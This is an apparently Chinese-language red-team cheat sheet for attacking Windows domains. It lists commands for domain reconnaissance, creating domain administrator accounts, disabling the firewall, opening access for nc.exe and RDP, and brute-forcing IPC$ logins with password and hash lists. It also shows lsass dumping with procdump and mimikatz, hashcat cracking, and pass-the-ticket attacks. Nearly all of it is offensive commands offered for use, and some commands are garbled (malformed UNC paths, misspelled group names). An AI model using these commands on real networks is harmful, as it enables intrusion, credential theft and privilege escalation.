Systeminfo 计算机详细信息(补丁信息) Net start 所启动的服务 Wmic service list brief 查询本机服务信息 Tasklist 进程列表 Wmic startup get command,caption 查看启动该程序信息 Schtasks /query /fo LIST /v计划任务 Netstat -ano 根据本机端口开放情况来判断有什么服务、其角色 Query user || qwinsta 查看当前在线用户 Net session 列出会话 Net share 查看本机的共享列表 Wmic share get name,path,status 查看共享列表 Net user 本地用户 Net user kkkk 查看本地用户信息 Net user kent password /add添加本地用户 Net localgroup 本地用户组 Net localgroup /domain 域用户组 Net localgroup Administrators kent /add 将本地用户添加到本地管理员组 Net localgroup adminnstrators 本地管理员组成员 net localgroup adminstrators /domain 域管理员组成员 Wmic useraccount get /all 获取域内用户详细信息 dsquery user 查看存在的用户 Net user /domain 域用户信息 Net user kkkk /domain 域用户kkkk信息 Net user kent password /add /domain添加域用户 Net localgroup Administrators kent /add /domain 将域用户添加到域管理员组 Net localgroup Administrators /add test\kent 将域用户添加到本地管理员组 Net group /domain 域用户组信息 Net view /domain 查询域 Net view /domain:test 查询域内计算机 Net accounts /domain 查询域中密码策略 Net group /domain 查看域内所有用户组 Net group “Domain Controllers” /domain 查看域控制器组 Net group “Domain computers” /domain 查看域内所有计算机列表 Net group “Domain admins” /domain 查看域内管理员用户 Net user /domain kent active:yes 启用域账户 Net user /domain kent active:no 禁用域账户 Nltest /DCLIST:test 查看域中域控制器名 Wmic useraccount get /all 用户详细信息 Net group “Domain Admins” /domain 对应组下的账户信息 nltest /domain_trusts 获取域信任信息 net config workstation 了解本机的配置信息 Netsh firewall show config 查看防火墙配置 Netsh advfirewall set allprofiles state off关闭防火墙(windows server 2003后) Netsh advfirewall firewall add rule name=”pass nc” dir=in action=allow program=”C:\nc.exe” 允许指定程序进入(windows server 2003后) Netsh advfirewall firewall add rule name=”allow nc” dir=out action=allow program=”C:\nc.exe”允许指定程序退出(windows server 2003后) Netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow 允许3389连接(windows server 2003后) Netsh advfirewall set currentprofile logging filename=”C:\winodws\temp\fw.log” 自定义防火墙日志存储位置 Reg query “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings”查看端口代理配置信息 Reg query “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /V PortNumber查看远程桌面端口号 以下命令是开启3389端口 (windows server 2003后) wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f net start TermService
我们用上述命令简单收集计算机基本信息: Ipconfig /all 根据DNS后缀判断是否有域 Net view /domain 判断是否存在域 确定域控的ip地址: net time /domain 然后通过nslookup或ping确定其域控ip: 确定当域内存活主机: for /L %I in (1,1,256) DO @ping -w 1 -l 1 192.168.202.%I | findstr “TTL=”
使用明文密码登录到域控,需要135端口开启: Net use \192.168.202.148\ipc$ password /user:test\administrator 把后门复制到域控c盘,at新建定时作业:
已知密码和用户批量连接ip: FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “password” /user:test\administrator 已知用户和ip批量连接密码: FOR /F %%i in (pass.txt) do net use \192.168.202.148\ipc$ “%%i” /user:test\administrator 已知用户和ip批量连接hash: FOR /F %%i in (hash.txt) do atexec.exe -hashes :“%%i” test/administrator@192.168.202.148 “whoami”
在windows server 2012以上的版本默认关闭wdiget,攻击者无法在内存中获取明文密码。 在windows server 2012以下的版本如果安装了KB2871997补丁,也无法获取明文密码。
Procdump.exe -accepteula -ma lsass.exe lsass.dmp(需要管理员权限) 利用Mimikatzm相关命令获取dmp中的hash: Privilege::debug Sekurlsa::minidump lsass.dmp Sekurlsa::logonPasswords full 可以通过hashcat爆破hash值,获得对应的明文密码: Hashcat -a 0 -m 1000 hashfile passfile
PTT(pass the ticket)不再使用NTLM进行认证,而是利用kerberos协议进行攻击,相对于PTH来说其不需要管理员权限,有三种常见的攻击方式:MS14-068(漏洞编号kb3011780)、Golder ticket、Silver ticket,其中后两者是将连接合法的票据注入内存中属于权限维持(后面写)。